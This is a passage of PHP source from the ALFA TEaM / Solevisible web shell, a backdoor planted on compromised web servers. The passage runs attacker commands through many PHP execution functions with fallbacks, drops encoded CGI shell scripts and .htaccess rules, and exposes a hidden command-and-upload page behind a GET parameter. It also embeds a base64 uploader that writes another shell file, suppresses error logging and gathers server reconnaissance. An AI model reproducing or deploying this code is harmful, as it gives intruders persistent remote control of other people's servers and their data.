681 $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
682 if ($lang == "perl")
683 $source = $perl;
684 elseif ($lang == "py")
685 $source = $py;
686 else
687 $source = $bash;
688 alfaWriteTocgiapi($lang . ".alfa", $source);
689 alfacgihtaccess('cgi', "alfacgiapi/");
690 } else {
691 $lang = $_COOKIE["alfacgiapi"];
692 }
693 $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=" . __ZW5jb2Rlcg("cd " . $GLOBALS['cwd'] . ";" . $cmd);
694 if ($is_curl) {
695 $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://") . $_SERVER["SERVER_NAME"] . dirname($_SERVER["REQUEST_URI"]) . "/alfacgiapi/" . $lang . ".alfa";
696 $post = new AlfaCURL();
697 $data = $post->Send($address, "post", $cmd);
698 } elseif ($is_socket) {
699 $server = $_SERVER["SERVER_NAME"];
700 $uri = dirname($_SERVER["REQUEST_URI"]) . "/alfacgiapi/" . $lang . ".alfa";
701 $data = _alfa_fsockopen($server, $uri, $cmd);
702 }
703 $out = "";
704 if (strstr($data, "[solevisible~api]")) {
705 if ($set_cookie) {
706 __alfa_set_cookie("alfacgiapi", $lang);
707 }
708 if (@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)) {
709 $out = $res[1];
710 }
711 } elseif ($lang == "perl") {
712 return _alfa_cgicmd($cmd_pure, "py", $set_cookie);
713 } elseif ($lang == "py") {
714 return _alfa_cgicmd($cmd_pure, "bash", $set_cookie);
715 } else {
716 if ($set_cookie) {
717 __alfa_set_cookie("alfacgiapi_mode", "off");
718 }
719 }
720 return trim($out);
721 } else {
722 return "";
723 }
724}
725function alfaGetCwd() {
726 if (function_exists("getcwd")) {
727 return @getcwd();
728 } else {
729 return dirname($_SERVER["SCRIPT_FILENAME"]);
730 }
731}
732function alfaEx($in, $re = false, $cgi = true, $all = false) {
733 $data = _alfa_php_cmd($in, $re);
734 if (empty($data) && $cgi || $all) {
735 if ($GLOBALS['sys'] == 'unix') {
736 if (strlen(_alfa_php_cmd("whoami")) == 0 || $all) {
737 $cmd = _alfa_cgicmd($in);
738 if (!empty($cmd)) {
739 return $cmd;
740 }
741 }
742 }
743 }
744 return $data;
745}
746function _alfa_php_cmd($in, $re = false) {
747 $out = '';
748 try {
749 if ($re)
750 $in = $in . " 2>&1";
751 if (function_exists('exec')) {
752 @exec($in, $out);
753 $out = @join("\n", $out);
754 } elseif (function_exists('passthru')) {
755 ob_start();
756 @passthru($in);
757 $out = ob_get_clean();
758 } elseif (function_exists('system')) {
759 ob_start();
760 @system($in);
761 $out = ob_get_clean();
762 } elseif (function_exists('shell_exec')) {
763 $out = shell_exec($in);
764 } elseif (function_exists("popen") && function_exists("pclose")) {
765 if (is_resource($f = @popen($in, "r"))) {
766 $out = "";
767 while (!@feof($f))
768 $out .= fread($f, 1024);
769 pclose($f);
770 }
771 } elseif (function_exists('proc_open')) {
772 $pipes = array();
773 $process = @proc_open($in . ' 2>&1', array(
774 array(
775 "pipe",
776 "w"
777 ),
778 array(
779 "pipe",
780 "w"
781 ),
782 array(
783 "pipe",
784 "w"
785 )
786 ), $pipes, null);
787 $out = @stream_get_contents($pipes[1]);
788 } elseif (class_exists('COM')) {
789 $alfaWs = new COM('WScript.shell');
790 $exec = $alfaWs->exec('cmd.exe /c ' . $_POST['alfa1']);
791 $stdout = $exec->StdOut();
792 $out = $stdout->ReadAll();
793 }
794 }
795 catch (Exception $e) {
796 }
797 return $out;
798}
799function _alfa_fsockopen($server, $uri, $post) {
800 $socket = @fsockopen($server, 80, $errno, $errstr, 15);
801 if ($socket) {
802 $http = "POST {$uri} HTTP/1.0\r\n";
803 $http .= "Host: {$server}\r\n";
804 $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
805 $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
806 $http .= "Content-length: " . strlen($post) . "\r\n";
807 $http .= "Connection: close\r\n\r\n";
808 $http .= $post . "\r\n\r\n";
809 fwrite($socket, $http);
810 $contents = "";
811 while (!@feof($socket)) {
812 $contents .= @fgets($socket, 4096);
813 }
814 list($header, $body) = explode("\r\n\r\n", $contents, 2);
815 @fclose($socket);
816 return $body;
817 } else {
818 return "";
819 }
820}
821if (isset($_GET["solevisible"])) {
822 @error_reporting(E_ALL ^ E_NOTICE);
823 echo '<html>';
824 echo "<title>Solevisible Hidden Shell</title>";
825 echo "<body bgcolor=#000000>";
826 echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">' . (function_exists('php_uname') ? php_uname() : '???') . '</font></b></big>';
827 $safe_mode = @ini_get('safe_mode');
828 if ($safe_mode) {
829 $r = "<b style='color: red'>On</b>";
830 } else {
831 $r = "<b style='color: green'>Off</b>";
832 }
833 echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
834 echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER['SERVER_SOFTWARE'] . "</font><br>";
835 echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />";
836 echo "PWD:<font color=#FFFFFF> " . str_replace("\\", "/", @alfaGetCwd()) . "/<br />";
837 echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
838 echo "<font color=#7CFC00>Disable functions : </font>";
839 $disfun = @ini_get('disable_functions');
840 if (empty($disfun)) {
841 $disfun = '<font color="green">NONE</font>';
842 }
843 echo "<font color=red>";
844 echo "$disfun";
845 echo "</font><br>";
846 echo "<b style='color: #7CFC00'>Your Ip Address is : </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
847 echo "<b style='color: #7CFC00'>Server Ip Address is : </font><font color=white>" . (function_exists('gethostbyname') ? @gethostbyname($_SERVER["HTTP_HOST"]) : '???') . "</font><br><p>";
848 echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
849 echo 'CWD: <input type="text" name="cwd" value="' . str_replace("\\", "/", @alfaGetCwd()) . '/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
850 if (isset($_FILES['file'])) {
851 if (@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']) . '/' . $_FILES['file']['name'])) {
852 echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>';
853 } else {
854 echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>';
855 }
856 }
857 echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>
858<hr><pre>';
859 if (isset($_POST['command_solevisible'])) {
860 if (strtolower(substr(PHP_OS, 0, 3)) == "win")
861 $separator = '&';
862 else
863 $separator = ';';
864 $solevisible = "cd '" . addslashes(str_replace("\\", "/", @alfaGetCwd())) . "'" . $separator . "" . __ZGVjb2Rlcg($_POST['command_solevisible']);
865 echo alfaEx($solevisible);
866 }
867 echo '</pre>
868</body></html>';
869 exit;
870}
871@error_reporting(E_ALL ^ E_NOTICE);
872@ini_set('error_log', NULL);
873@ini_set('log_errors', 0);
874@ini_set('max_execution_time', 0);
875@ini_set('magic_quotes_runtime', 0);
876@set_time_limit(0);
877if (function_exists('set_magic_quotes_runtime')) {
878 @set_magic_quotes_runtime(0);
879}
880foreach ($_POST as $key => $value) {
881 if (is_array($_POST[$key])) {
882 $i = 0;
883 foreach ($_POST[$key] as $f) {
884 $f = trim(str_replace(' ', '+', $f));
885 $_POST[$key][$i] = decrypt_post($f);
886 $i++;
887 }
888 } else {
889 $value = trim(str_replace(' ', '+', $value));
890 $_POST[$key] = decrypt_post($value);
891 }
892}
893$default_action = 'FilesMan2';//'FilesMan';
894$default_use_ajax = true;
895$default_charset = 'Windows-1251';
896if(strtolower(substr(PHP_OS,0,3))=="win")
897$GLOBALS['sys']='win';
898else
899$GLOBALS['sys']='unix';
900$GLOBALS['home_cwd'] = @alfaGetCwd();
901$GLOBALS["need_to_update_header"] = "false";
902$GLOBALS['glob_chdir_false'] = false;
903if(isset($_POST['c'])){
904if(!@chdir($_POST['c'])){
905 $GLOBALS['glob_chdir_false'] = true;
906}
907}
908$GLOBALS['cwd'] = (isset($_POST['c']) && @is_dir($_POST['c']) ?$_POST['c']:@alfaGetCwd());
909if($GLOBALS['glob_chdir_false']){
910 $GLOBALS['cwd'] = (isset($_POST['c']) && !empty($_POST['c']) ? $_POST['c'] : @alfaGetCwd());
911}
912if($GLOBALS['sys'] == 'win'){
913$GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
914$GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
915}
916if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
917if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
918define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
919function alfahead(){
920$GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
921$alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
922define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
923if(!isset($_POST['ajax'])){
924function Alfa_GetDisable_Function(){
925$disfun = @ini_get('disable_functions');
926$afa = '<span class="header_show_all">All Functions Accessible</span>';
927if(empty($disfun))return($afa);
928$s = explode(',',$disfun);
929$s = array_unique($s);
930$i=0;
931$b=0;
932$func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
933$black_list = array();
934$allow_list = array();
935foreach($s as $d){
936 $d=trim($d);
937 if(empty($d)||!is_callable($d))continue;
938 if(!function_exists($d)){
939 if(in_array($d,$func)){
940 $dis .= $d." | ";$b++;
941 $black_list[] = $d;
942 }else{
943 $allow_list[] = $d;
944 }
945 $i++;
946 }
947}
948if($i==0)return($afa);
949if($i <= count($func)){
950$all = array_values(array_merge($black_list, $allow_list));
951return('<span class="disable_functions">'.implode(" | ", $all).'</span>');
952}
953return('<span class="disable_functions">'.$dis.'</span><a id="menu_opt_GetDisFunc" href=javascript:void(0) onclick="alfa_can_add_opt = true;g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All ('.$i.')</span></a>');
954}
955function AlfaNum(){
956$args = func_get_args();
957$alfax = array();
958$find = array();
959for($i=1;$i<=10;$i++){
960$alfax[] = $i;
961}
962foreach($args as $arg){
963$find[] = $arg;
964}
965echo '<script>';
966foreach($alfax as $alfa){
967if(in_array($alfa,$find))
968continue;
969echo 'alfa'.$alfa."_=";
970}
971echo '""</script>';
972}
973if(empty($_POST['charset']))
974$_POST['charset'] = $GLOBALS['default_charset'];
975$freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
976$totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
977$totalSpace = $totalSpace?$totalSpace:1;
978$on="<span class='header_on'> ON </span>";
979$of="<span class='header_off'> OFF </span>";
980$none="<span class='header_none'> NONE </span>";
981if(function_exists('ssh2_connect'))
982$ssh2=$on;
983else
984$ssh2=$of;
985if(function_exists('curl_version'))
986$curl=$on;
987else
988$curl=$of;
989if(function_exists('mysql_get_client_info')||class_exists('mysqli'))
990$mysql=$on;
991else
992$mysql=$of;
993if(function_exists('mssql_connect'))
994$mssql=$on;
995else
996$mssql=$of;
997if(function_exists('pg_connect'))
998$pg=$on;
999else
1000$pg=$of;
1001if(function_exists('oci_connect'))
1002$or=$on;
1003else
1004$or=$of;
1005if(@ini_get('disable_functions'))
1006$disfun=@ini_get('disable_functions');
1007else
1008$disfun="All Functions Enable";
1009if(@ini_get('safe_mode'))
1010$safe_modes="<span class='header_off'>ON</span>";
1011else
1012$safe_modes="<span class='header_on'>OFF</span>";
1013$cgi_shell="<span class='header_off' id='header_cgishell'>OFF</span>";
1014if(@ini_get('open_basedir')){
1015$basedir_data = @ini_get('open_basedir');
1016if(strlen($basedir_data)>120){
1017$open_b=substr($basedir_data,0, 120)."...";
1018}else{
1019$open_b = $basedir_data;
1020}
1021}else{$open_b=$none;}
1022if(@ini_get('safe_mode_exec_dir'))
1023$safe_exe=@ini_get('safe_mode_exec_dir');
1024else
1025$safe_exe=$none;
1026if(@ini_get('safe_mode_include_dir'))
1027$safe_include=@ini_get('safe_mode_include_dir');
1028else
1029$safe_include=$none;
1030if(!function_exists('posix_getegid'))
1031{
1032$user = function_exists("get_current_user")?@get_current_user():"????";
1033$uid = function_exists("getmyuid")?@getmyuid():"????";
1034$gid = function_exists("getmygid")?@getmygid():"????";
1035$group = "?";
1036}else{
1037$uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");
1038$gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");
1039$user = $uid['name'];
1040$uid = $uid['uid'];
1041$group = $gid['name'];
1042$gid = $gid['gid'];
1043}
1044$cwd_links = '';
1045$path = explode("/", $GLOBALS['cwd']);
1046$n=count($path);
1047for($i=0; $i<$n-1; $i++) {
1048$cwd_links .= "<a class='header_pwd' onclick='g(\"FilesMan\",\"";
1049$cach_cwd_path = "";
1050for($j=0; $j<=$i; $j++){
1051$cwd_links .= $path[$j].'/';
1052$cach_cwd_path .= $path[$j].'/';
1053}
1054$cwd_links .= "\")' path='".$cach_cwd_path."' href='#action=fileman&path=".$cach_cwd_path."'>".$path[$i]."/</a>";
1055}
1056$drives = "";
1057foreach(range('a','z') as $drive)
1058if(@is_dir($drive.':\\'))
1059$drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
1060$csscode =' -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
1061echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1062<html xmlns="http://www.w3.org/1999/xhtml">
1063<head>
1064<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
1065<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
1066<link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
1067<title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ::..</title>
1068<style type="text/css">';?>
1069.hlabale{color:#67abdf;border-radius:4px;border:1px solid #27979b;margin-left:7px;padding:2px}#tbl_sympphp tr{text-align:center}#PhpCode,.php-evals-ace,.view_ml_content{position:absolute;top:0;right:0;bottom:0;left:0;background:#1b292b26;top:50px}.editor-view{position:relative;height:100%}.view-content{position:absolute;overflow-y:auto;width:100%;height:93%}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px;background-color:#000115}::-webkit-scrollbar{width:10px;background-color:#000115}::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#1e82b5}.editor-file-name{margin-left:29px;margin-top:4px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.editor-icon{position:absolute}.is_active{background:rgba(49,55,93,.77);border-radius:10px}.history-list{height:88%;overflow-y:auto}.opt-title{position:absolute;left:50%;top:50%;transform:translate(-50%,-50%);color:#2fd051;font-size:25px;font-family:monospace}.options_min_badge{visibility:hidden;text-align:center;right:30px;color:#fff;background:#2a8a24;padding:6px;border-radius:50%;width:15px;height:15px;display:inline-block;position:absolute;top:-7px}#cgiloader-minimized,#database_window-minimized,#editor-minimized,#options_window-minimized{display:block;position:fixed;right:-30px;width:30px;height:30px;top:30%;z-index:9999}.minimized-wrapper{position:relative;background:#0e304a;width:44px;height:130px;cursor:pointer;border-bottom-left-radius:5px;border-top-left-radius:5px}.minimized-text{transform:rotate(-90deg);color:wheat;font-size:x-large;display:inline-block;position:absolute;right:-51px;width:129px;top:-10px;border-top-left-radius:4%;height:56px;padding:3px}.close-button,.editor-minimize{height:26px;width:38px;right:7px;background:#1d5673;cursor:pointer;position:absolute;box-sizing:border-box;line-height:50px;display:inline-block;top:17px;border-radius:100px}.editor-minimize{right:50px}.close-button:after,.close-button:before,.editor-minimize:before{transform:rotate(-45deg);content:"";position:absolute;top:63%;right:6px;margin-top:-5px;margin-left:-25px;display:block;height:4px;width:27px;background-color:rgba(216,207,207,.75);transition:all .25s ease-out}.editor-minimize:before{transform:rotate(0)}.close-button:after{transform:rotate(-135deg)}.close-button:hover:after,.close-button:hover:before,.editor-minimize:hover:before{background-color:red}.close-button:hover,.editor-minimize:hover{background-color:rgba(39,66,80,.96)}#cgiloader,#database_window,#editor,#options_window{display:none;position:fixed;top:0;width:100%;height:100%;z-index:20}.editor-wrapper{width:100%;height:100%;position:relative;top:1%}.editor-header{width:97%;background:rgba(21,66,88,.93);height:37px;margin-left:13px;position:relative;border-top-left-radius:15px;border-top-right-radius:15px}.editor-path{position:absolute;font-size:x-large;margin-left:10px;top:6px;color:#00ff7f}.editor-modal{position:relative;top:0;background-color:rgba(0,1,23,.95);height:90%;margin-left:20%;margin-right:2%;border:2px #0e304a solid}.editor-explorer{width:19%;height:90%;background-color:rgba(0,1,23,.94);position:absolute;z-index:2;left:1%;border:2px #0e304a solid}.editor-controller{position:relative;top:-13px}.file-holder{position:relative;width:100%;height:30px}.file-holder>.history{position:absolute;color:#03b3a3;cursor:pointer;left:5px;font-size:18px;font-family:sans-serif;width:89%;height:100%;z-index:3;border-radius:10px;transition:background-color .6s ease-out}.file-holder>.history-close{display:block;opacity:0;position:absolute;right:2px;width:20px;top:4px;text-align:center;cursor:pointer;color:#fff;background:red;border-radius:100px;font-family:monospace;z-index:10;transition:opacity .6s ease-out;font-size:15px;height:19px}.file-holder>.history:hover{background-color:#646464}.editor-explorer>.hheader{position:relative;color:#14ff07;border-bottom:2px #206aa2 solid;text-align:center;font-family:sans-serif;margin-bottom:10px;height:55px}.editor-search{position:absolute;bottom:7px;left:31px}.hheader-text{position:absolute;left:8px;top:2px}.history-clear{position:absolute;right:8px;top:2px;cursor:pointer}.editor-body{position:relative;margin-left:3px;height:100%}.editor-anim-close{-webkit-animation:editorClose .8s ease-in-out forwards;-moz-animation:editorClose .8s ease-in-out forwards;-ms-animation:editorClose .8s ease-in-out forwards;animation:editorClose .8s ease-in-out forwards}@keyframes editorClose{0%{visibility:1;opacity:1}100%{visibility:0;opacity:0}}.editor-anim-minimize{-webkit-animation:editorMinimize .8s ease-in-out forwards;-moz-animation:editorMinimize .8s ease-in-out forwards;-ms-animation:editorMinimize .8s ease-in-out forwards;animation:editorMinimize .8s ease-in-out forwards}@keyframes editorMinimize{0%{right:0;opacity:1}100%{right:-2000px;opacity:0}}.editor-anim-show{-webkit-animation:editorShow .8s ease-in-out forwards;-moz-animation:editorShow .8s ease-in-out forwards;-ms-animation:editorShow .8s ease-in-out forwards;animation:editorShow .8s ease-in-out forwards}@keyframes editorShow{0%{right:-2000px;opacity:0}100%{right:0;opacity:1}}.minimized-show{-webkit-animation:minimizeShow .8s ease-in-out forwards;-moz-animation:minimizeShow .8s ease-in-out forwards;-ms-animation:minimizeShow .8s ease-in-out forwards;animation:minimizeShow .8s ease-in-out forwards}@keyframes minimizeShow{0%{right:-30px;opacity:0}100%{right:0;opacity:1}}.minimized-hide{-webkit-animation:minimizeHide .8s ease-in-out forwards;-moz-animation:minimizeHide .8s ease-in-out forwards;-ms-animation:minimizeHide .8s ease-in-out forwards;animation:minimizeHide .8s ease-in-out forwards}@keyframes minimizeHide{0%{right:0;opacity:1}100%{right:-30px;opacity:0}}.solevisible-text:hover{-webkit-text-shadow:0 0 25px #0f0;-moz-text-shadow:0 0 25px #0f0;-ms-text-shadow:0 0 25px #0f0;text-shadow:0 0 25px #0f0}.update-holder{position:fixed;top:0;background-color:rgba(0,24,29,.72);width:100%;height:100%}.update-content{position:relative}.update-content>a{text-decoration:none;position:absolute;color:rgba(103,167,47,.77);left:24%;margin-top:7%;font-size:40px}.update-close{position:absolute;right:0;margin-right:23px;top:10px;font-size:27px;background-color:#130f50;width:5%;border-radius:100px;cursor:pointer;border:2px #0e265a solid}.update-close:hover{border:2px #25ff00 solid;color:red}.filestools{height:auto;width:auto;color:#67abdf;font-size:12px;font-family:Verdana,Geneva,sans-serif}@-moz-document url-prefix(){#search-input{width:173px}.editor-path{top:3px}}.filters-holder{padding:5px;padding-left:10px}.filters-holder input{width:200px}.filters-holder span{color:#8bc7f7}#rightclick_menu{width:175px;visibility:hidden;opacity:0;position:fixed;background:#0f304a;color:#555;font-family:sans-serif;font-size:11px;-webkit-transition:opacity .5s ease-in-out;-moz-transition:opacity .5s ease-in-out;-ms-transition:opacity .5s ease-in-out;-o-transition:opacity .5s ease-in-out;transition:opacity .5s ease-in-out;-webkit-box-shadow:-1px 0 17px 0 #8b8b8c;-moz-box-shadow:-1px 0 17px 0 #8b8b8c;box-shadow:-1px 0 17px 0 #8b8b8c;padding:0;border:1px solid #737373;border-radius:10px}#rightclick_menu a{display:block;color:#fff;font-weight:bolder;text-decoration:none;padding:6px 8px 6px 30px;position:relative;padding-left:40px}#rightclick_menu a i.fa,#rightclick_menu a img{height:20px;font-size:17px;width:20px;position:absolute;left:5px;top:2px;padding-left:5px}#rightclick_menu a span{color:#bcb1b3;float:right}#rightclick_menu a:hover{color:#fff;background:#3879d9}#rightclick_menu hr{border:1px solid #ebebeb;border-bottom:0}.cl-popup-fixed{position:fixed;top:0;left:0;width:100%;height:100%;background:#201e1ead}#shortcutMenu-holder{position:absolute;top:40%;left:50%;transform:translate(-50%,-50%);background:#1f1e1edb;height:190px;width:500px;color:#fff}#shortcutMenu-holder>.popup-head{background:#207174;padding:6px;border-top:10px;text-align:center;font-family:sans-serif;color:#fff}#shortcutMenu-holder>form{padding:10px}#shortcutMenu-holder>form>label{display:block}#shortcutMenu-holder>form>input{width:99%;height:24px;margin-top:4px;color:#fff;outline:0;font-size:16px}#shortcutMenu-holder>.popup-foot{float:right;height:30px;margin-right:8px}#shortcutMenu-holder>.popup-foot>button{height:100%;cursor:pointer;color:#fff;outline:0}.php-terminal-output{overflow:auto;height:86%;border:1px solid #1e5673;border-radius:10px}.cmd-history-holder{visibility:hidden;opacity:0;position:absolute;color:#dff3d5;background:#093d58;top:-300px;height:300px;width:calc(69% + -11px);border-radius:10px 10px 0 0;left:calc(2% - 9px);transition:visibility .5s,opacity .5s linear}.cmd-history-holder .commands-history-header{background:#37504e;text-align:center;border-radius:10px 10px 0 0}.cmd-history-icon{width:27px;top:6px;left:calc(69% + 5px);position:absolute;cursor:pointer}.history-cmd-line{padding:4px;border-bottom:1px dashed;cursor:pointer}.history-cmd-line:hover{background:#961111}#myUL,#myUL ul{list-style-type:none}#myUL{margin:0;padding:0}.box{cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.box::before{content:"\2610";color:#000;display:inline-block;margin-right:6px}.check-box::before{content:"\2611";color:#1e90ff}.nested{display:none}.active{display:block}.flag-holder>img{width:20px;vertical-align:middle;padding-left:6px}#options_window .content_options_holder .options_holder{position:relative;display:none;overflow:auto;min-height:300px;max-height:calc(100vh - 100px)}#options_window .content_options_holder .options_holder .header{min-height:50vh}#options_window .content_options_holder .options_holder.option_is_active{display:block}#options_window .content_options_holder .options_tab{padding:5px;margin-left:14px;margin-right:30px;background:#000;border-bottom:7px solid #0f304a;border-left:7px solid #0f304a;border-right:7px solid #0f304a;overflow-x:auto;white-space:nowrap}#filesman_tabs .filesman_tab img,#options_window .content_options_holder .options_tab .tab_name img,.editor-tab-name img,.sql-tabs .sql-tabname img,.terminal-tabs .terminal-tab img{width:10px;vertical-align:middle;margin-left:5px}#filesman_tabs .filesman_tab,#options_window .content_options_holder .options_tab .tab_name,.editor-tab-name,.sql-tabs 